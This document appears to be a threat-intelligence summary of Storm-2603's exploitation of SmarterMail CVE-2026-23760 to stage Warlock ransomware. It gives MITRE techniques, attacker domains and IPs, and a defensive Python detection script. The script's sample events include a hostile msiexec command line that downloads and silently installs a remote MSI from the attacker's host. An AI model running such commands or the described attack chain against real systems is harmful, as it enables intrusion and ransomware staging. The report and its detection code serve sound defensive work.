ReliaQuest observed exploitation of SmarterTools SmarterMail (CVE-2026-23760) linked to the China-based actor “Storm-2603,” which abused the password reset API and the Volume Mount feature to achieve system execution and stage Warlock ransomware. Immediate mitigation steps include upgrading SmarterMail to Build 9511+, isolating mail servers, and restricting outbound traffic to prevent downloads and Velociraptor-based C2. #Warlock #Storm-2603
Key points
- ReliaQuest attributes active exploitation of CVE-2026-23760 to Storm-2603, which used the SmarterMail password reset API to overwrite administrator credentials and bypass authentication.
- The actor chained the auth bypass with SmarterMail’s Volume Mount feature to inject commands, gaining remote code execution on the Windows host.
- After RCE, attackers used msiexec to download an MSI (v4.msi) from Supabase and installed Velociraptor as a persistent C2/backdoor, blending with legitimate admin activity.
- Activity consistent with Warlock ransomware tradecraft was observed, though no ransomware binary was deployed during the investigated staging event.
- Parallel probes for CVE-2026-24423 (ConnectToHub API calls) originated from distinct infrastructure, indicating multiple actors or opportunistic scanning during the same window.
- Recommended defenses: upgrade SmarterMail to Build 9511+, segment/isolate mail servers, and enforce strict outbound firewall rules to block non-mail traffic and cloud-hosting destinations.
MITRE Techniques
- [T1190] Exploit Public-Facing Application – Used to gain initial access by exploiting SmarterMail CVE-2026-23760 and invoking the password reset API (‘allows the attacker to reset the administrator password through the password reset API.’)
- [T1098] Account Manipulation – Overwrote administrative credentials via the password reset workflow because the vulnerable versions accepted any input as proof of identity (‘the system accepts any value, even an incorrect entry, as valid proof of identity.’)
- [T1059] Command and Scripting Interpreter – Injected commands into the Volume Mount feature; MailService.exe was observed spawning a shell to execute them (‘MailService.exe spawning a command shell (cmd.exe) to execute the request.’)
- [T1218] Signed Binary Proxy Execution – Abused Windows Installer (msiexec) to execute an MSI payload, leveraging a signed system binary to run attacker-controlled code (‘abuse the Windows Installer (msiexec) to download a malicious payload (v4.msi) from Supabase’)
- [T1105] Ingress Tool Transfer – Transferred tooling/payloads from external hosting (Supabase) to the compromised host to stage persistence and C2 (‘download a malicious payload (v4.msi) from Supabase’)
- [T1071] Application Layer Protocol – Used Velociraptor, a legitimate forensics tool, configured for command-and-control to maintain access and blend with administrative traffic (‘The MSI file installs Velociraptor, which the attackers configure for command-and-control (C2).’)
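Defender-side detection for the two host behaviours the techniques above describe, MailService.exe spawning cmd.exe and msiexec being handed a remote MSI, as an added example (not code from the ReliaQuest report). It runs over constructed Sysmon-style process-creation events; the SmarterMail install path, the URL path and the event field names are assumptions, while the Supabase domain and the v4.msi file name come from the report.

```python
"""Added example (not from the ReliaQuest report): flags MailService.exe spawning a
shell and msiexec pointed at a remote MSI, then lists hosts to block at the egress firewall."""
import re
from typing import Dict, List, Set
from urllib.parse import urlparse

REMOTE_URL = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}

# Sysmon Event ID 1-style process-creation events, constructed for this example. The
# SmarterMail install path and URL path are assumptions; the domain and v4.msi come from the report.
MAIL_SVC = r"C:\Program Files (x86)\SmarterTools\SmarterMail\Service\MailService.exe"
MSI_URL = "https://vdfccjpnedujhrzscjtq.supabase.co/ASSUMED_PATH/v4.msi"
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"ParentImage": MAIL_SVC, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": f"cmd.exe /c msiexec /i {MSI_URL} /qn"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": f"msiexec /i {MSI_URL} /qn"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r'msiexec /i "C:\Users\admin\Downloads\tool.msi" /qn'},  # benign local install
]

def basename(path: str) -> str:
    """Lower-cased file name of a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()

def detect(event: Dict[str, str]) -> List[str]:
    """Return the rule names an event triggers; an empty list means no hit."""
    parent, image = basename(event.get("ParentImage", "")), basename(event.get("Image", ""))
    cmdline = event.get("CommandLine", "")
    hits = []
    # T1059: the mail service process has no business launching a command shell.
    if parent == "mailservice.exe" and image in SHELLS:
        hits.append("mailservice_spawns_shell")
    # T1218 / T1105: Windows Installer given an http(s) package source, directly or via a shell.
    if "msiexec" in cmdline.lower() and REMOTE_URL.search(cmdline):
        hits.append("msiexec_remote_msi")
    return hits

def remote_hosts(events: List[Dict[str, str]]) -> Set[str]:
    """Hosts msiexec was told to fetch from: candidates for the outbound block list."""
    return {urlparse(u).hostname for ev in events if "msiexec_remote_msi" in detect(ev)
            for u in REMOTE_URL.findall(ev["CommandLine"]) if urlparse(u).hostname}

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(basename(ev["Image"]), "->", ", ".join(detect(ev)) or "clean")
    print("egress block candidates:", sorted(remote_hosts(SAMPLE_EVENTS)))
```

The second rule keys on the command line rather than the image name so a `cmd.exe /c msiexec …` one-liner is caught on the shell event as well as on the msiexec child.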
Indicators of Compromise
- [Domain] Hosting and delivery infrastructure – vdfccjpnedujhrzscjtq.supabase[.]co, auth.qgtxtebl.workers[.]dev
- [Domain] Additional attacker-related domain – 2-api.mooo[.]com (observed in probing/activity)
- [IP Address] Attacker infrastructure observed – 162.252.198[.]197, 199.217.99[.]93, 157.245.156[.]118, 45.127.35[.]186, 178.128.103[.]218
- [File Name] Payloads and tooling – v4.msi (malicious installer downloaded via msiexec), Velociraptor installer (installed and configured for C2)
- [Process Name] Legitimate processes abused to mask activity – MailService.exe (spawned cmd.exe), cmd.exe (command shell used to execute downloads/installers)